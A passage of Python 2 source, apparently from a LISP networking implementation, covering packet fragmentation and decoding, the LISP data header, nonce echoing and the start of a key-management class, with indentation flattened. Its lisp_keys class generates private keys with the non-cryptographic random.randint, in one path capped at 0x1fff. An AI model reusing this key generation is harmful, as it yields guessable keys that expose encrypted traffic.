for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = frag_field / 8
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
# Set length of fragment, set up offset for next fragment-offset,
# and header checksum fragment packet. Then prepend inner header
# to payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
# Change outer header length and header checksum if IPv4 outer
# header. If IPv6 outer header, raw sockets prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# in host byte order. So have to byte-swapped here. But when testing
# we (UPC guys) discovered the frag field didn't need swapping. The
# conclusion is that byte-swapping is necessary for MacOS but not for
# Linux OSes.
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3] + packet[2] + packet[4:6] + \
packet[7] + packet[6] + packet[8::]
else:
packet = packet[0:2] + packet[3] + packet[2] + packet[4::]
#endif
#endif
return(packet)
#enddef
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error, e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error, e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def is_lisp_packet(self, packet):
udp = (struct.unpack("B", packet[9])[0] == LISP_UDP_PROTOCOL)
if (udp == False): return(False)
port = struct.unpack("H", packet[22:24])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
port = struct.unpack("H", packet[20:22])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
return(False)
#enddef
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = 0
if (is_lisp_packet):
iid = self.lisp_header.get_instance_id()
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key,
addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
self.inner_is_fragment = (frag_field & 0x2000 or frag_field != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where Info-Request is inside of a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (lisp_iid_to_interface.has_key(iid) == False): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
#endif
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9] if self.inner_version == 4 else packet[6]
protocol = struct.unpack("B", protocol)[0]
flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
#endof
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
#endif
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header():
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
self.second_long |= (iid << 8)
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
class lisp_echo_nonce():
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
#endif
#endif
#
# Should we stop requesting nonce-echoing? Only do so if we received
# a echo response and some time (10 seconds) has past.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
# Start echoing the nonce. Get a new nonce. If a echo-nonce is stored
# use the same nonce as last time regardless if we received an echo
# response. High-order bit set is telling caller to set the e-bit in
# header.
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
# Check how long its been since last received echo.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
# If last received echo was a while ago and a new request-nonce was
# sent recently, say the echo happen so we can bootstrap a new request
# and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys():
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key)
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
return(iv)
#enddef
def key_length(self, key):
if (type(key) != str): key = self.normalize_pub_key(key)
return(len(key) / 2)
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
return("0x{}...{}({})".format(k[0:4], k[-4::], self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (type(key) == str):
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#endif
key = lisp_hex_string(key).zfill(256)
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
